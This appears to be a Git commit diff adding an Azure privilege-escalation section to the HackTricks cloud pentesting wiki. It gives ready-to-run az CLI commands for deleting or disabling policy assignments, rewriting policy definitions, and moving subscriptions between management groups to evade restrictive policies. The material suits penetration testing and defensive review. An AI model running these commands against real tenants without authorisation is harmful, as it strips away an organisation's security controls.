gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

pe - azure

Browse Source
This commit is contained in:
carlospolop
2025-11-28 10:42:46 +01:00
parent fd84f36033
commit 55afbe81c4
1 changed files with 110 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

110
src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md
View File

@@ -81,6 +81,116 @@ az rest --method PUT \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}' --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
``` ```
### Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete
An attacker with the permission `Microsoft.Authorization/policyAssignments/write` or `Microsoft.Authorization/policyAssignments/delete` over a management group, subscription, or resource group can **modify or delete Azure policy assignments**, potentially **disabling security restrictions** that block specific operations.
This allows access to resources or functionalities that were previously protected by the policy.
**Delete a policy assignment:**
```bash
az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
```
**Disable a policy assignment:**
```bash
az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled
```
**Verify the changes:**
```bash
# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"
```
### Microsoft.Authorization/policyDefinitions/write
An attacker with the permission `Microsoft.Authorization/policyDefinitions/write` can **modify Azure policy definitions**, changing the rules that control security restrictions across the environment.
For example, a policy that limits the allowed regions for creating resources can be modified to allow any region, or the policy effect can be changed to make it ineffective.
**Modify a policy definition:**
```bash
az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json
```
**Verify the changes:**
```bash
az policy definition list --output table
az policy definition show --name "<policyDefinitionName>"
```
### Microsoft.Management/managementGroups/write
An attacker with the permission `Microsoft.Management/managementGroups/write` can **modify the hierarchical structure of management groups** or **create new management groups**, potentially evading restrictive policies applied at higher levels.
For example, an attacker can create a new management group without restrictive policies and then move subscriptions to it.
**Create a new management group:**
```bash
az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"
```
**Modify a management group hierarchy:**
```bash
az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"
```
**Verify the changes:**
```bash
az account management-group list --output table
az account management-group show \
--name "<managementGroupId>" \
--expand
```
### Microsoft.Management/managementGroups/subscriptions/write
An attacker with the permission `Microsoft.Management/managementGroups/subscriptions/write` can **move subscriptions between management groups**, potentially **evading restrictive policies** by moving a subscription to a group with less restrictive or no policies.
**Move a subscription to a different management group:**
```bash
az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"
```
**Verify the changes:**
```bash
az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"
```
{{#include ../../../banners/hacktricks-training.md}} {{#include ../../../banners/hacktricks-training.md}}